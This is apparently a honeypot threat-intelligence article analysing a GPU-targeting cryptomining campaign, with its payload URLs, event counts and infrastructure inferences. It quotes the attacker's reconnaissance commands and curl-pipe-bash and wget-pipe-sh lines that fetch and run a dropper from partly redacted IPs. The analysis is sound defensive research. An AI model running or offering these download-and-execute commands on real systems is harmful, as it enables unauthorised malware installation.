3
Payload URLs
6
Download attempts
259
Execution attempts
0
Bytes executed

The three payload URLs

During the analysis period, the honeypot recorded download attempts to exactly three external destinations, all three to a direct IP and unencrypted. Their behavior differs:

URL #1 — Direct IP, no DNS

http://151.242.[REDACTED].40/loader.sh

1 download_attempt + 1 download recorded. The URL points directly to an IP, with no domain name. Using a direct IP avoids DNS resolution — no DNS logs, no detection through malicious-domain blocking. The name loader.sh is typical of first-stage droppers: a shell script that installs the real payload.

Content received: 684 bytes captured in the isolated environment. The payload was stored but execution was blocked: 0 bytes executed on the real host.

URL #2 — The same payload from a second host

http://197.255.[REDACTED].88:1987/favico.ico

1 download_attempt + 1 download recorded. It is served on a high port (1987) and with a decoy namefavico.ico mimics a favicon to pass as harmless traffic, but its content is a script. HTTP without TLS: the payload travels unencrypted.

The telling detail: exactly 684 bytes, the same size as loader.sh. It is the same payload served from two distinct IPs — hosting redundancy: if one goes down or is blocked, the other keeps serving.

URL #3 — The destination that failed

http://31.172.[REDACTED].45/mot

2 download_attempt, 0 download: two attempts, 0 bytes received. The server did not respond or was blocked at the source. A reminder that the attacker's ephemeral infrastructure also fails — and that every attempt, successful or not, is logged.

The download chain: how it got here

The download attempts did not occur in isolation. They followed the documented GPU hunter pattern: the attacker first runs reconnaissance (lspci, nvidia-smi), and only in sessions where the full sequence completed without errors does the script move on to the payload download phase.

# Phase 1: GPU hunter (hardware reconnaissance)
$lspci | grep VGA | cut -f5- -d ' '
$nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8}'
$/bin/./uname -s -v -n -r -m
# Phase 2: dropper download (conditional on a detected GPU)
$curl -s http://151.242.[REDACTED].40/loader.sh | bash
# — or the wget equivalent —
$wget -qO- http://197.255.[REDACTED].88:1987/favico.ico | sh

The curl ... | bash pattern is deliberate: it downloads and executes in a single instruction, without writing the script to disk first. This prevents the binary from being left as a forensic artifact on the filesystem.

The 259 execution attempts

The honeypot recorded 259 events of type execution_attempt and 547 file_write events in the window — the downloaded payload is stored in the isolated environment before any attempt to execute it. No execution succeeded.

EventCountResult
file_write (payload stored in isolated environment)547Success — file recorded
execution_attempt (attempt to run the payload)259Execution blocked — no code executed
Bytes executed on the real host0The honeypot never executes external code

What the dropper's infrastructure reveals

All three URLs point to direct IPs, with no domain and unencrypted. That combination points to an operation built on ephemeral infrastructure. Some inferences:

Relationship with the GPU hunter campaign

The sessions with download attempts are a subset of the GPU hunter sessions. The dropper only activates when the hardware reconnaissance returns a positive result — confirming that the campaign is optimizing the ratio of useful infections to total attempts.

In economic terms: downloading the payload has a cost (traffic, exposure of the dropper URL). The prior reconnaissance ensures that this cost is only incurred on machines with a GPU — the only ones that justify installing XMRig.

Detection and containment

The detection signals for this phase are more specific than those for the GPU hunter:

Data collected for cybersecurity research purposes. All information comes from unsolicited activity recorded on our own infrastructure.

Data source
CipherSentry SSH honeypot · 2026-06-26 a 2026-06-28
← All articles